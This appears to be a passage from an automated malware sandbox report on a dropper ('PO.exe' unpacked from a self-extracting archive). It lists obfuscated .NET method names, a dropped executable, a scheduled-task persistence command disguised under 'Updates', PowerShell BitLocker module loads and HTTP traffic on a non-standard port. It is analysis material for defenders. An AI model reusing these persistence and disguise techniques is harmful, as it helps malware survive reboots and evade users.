Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, ocaowhuM8mELpeCg1ig.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, S4G9XnevepCQioK3is.cs	High entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, IcmTCBLlejKLSTLxHH.cs	High entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, lBVadcz5bviu8jxc7G.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, rmFfbhZkpQQsFEbfol.cs	High entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, zFBqeEjRFBLSRfwf0A.cs	High entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, eQO0SCdvWMrQTMtdfV.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, qQX0XtkHmUSEBYI1Ue.cs	High entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Bvw1RBceaN523NPJik.cs	High entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, oVpml5PMcJ46Alhh5x.cs	High entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, j7TAQmhL1SaPlhQ8HW.cs	High entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	High entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.cs	High entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, LJTjbSmSH66JQvrsi3.cs	High entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, xcI1enoJkXBKDmiAdr.cs	High entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, X5ql3I12sxhVIpAQQo.cs	High entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Psiccf4bVvVDkx6mSI.cs	High entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.cs	High entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, pLG4Ea5tVQMslBLeve.cs	High entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, vDrWgAuv05qGryjBLgI.cs	High entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, p7yy0t7M82Hmx79AfL.cs	High entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, q72tq2ximplPDGFyoN.cs	High entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, ocaowhuM8mELpeCg1ig.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, S4G9XnevepCQioK3is.cs	High entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, IcmTCBLlejKLSTLxHH.cs	High entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, lBVadcz5bviu8jxc7G.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, rmFfbhZkpQQsFEbfol.cs	High entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, zFBqeEjRFBLSRfwf0A.cs	High entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, eQO0SCdvWMrQTMtdfV.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, qQX0XtkHmUSEBYI1Ue.cs	High entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, Bvw1RBceaN523NPJik.cs	High entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, oVpml5PMcJ46Alhh5x.cs	High entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, j7TAQmhL1SaPlhQ8HW.cs	High entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	High entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.cs	High entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, LJTjbSmSH66JQvrsi3.cs	High entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, xcI1enoJkXBKDmiAdr.cs	High entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, X5ql3I12sxhVIpAQQo.cs	High entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, Psiccf4bVvVDkx6mSI.cs	High entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.cs	High entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, pLG4Ea5tVQMslBLeve.cs	High entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49723

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
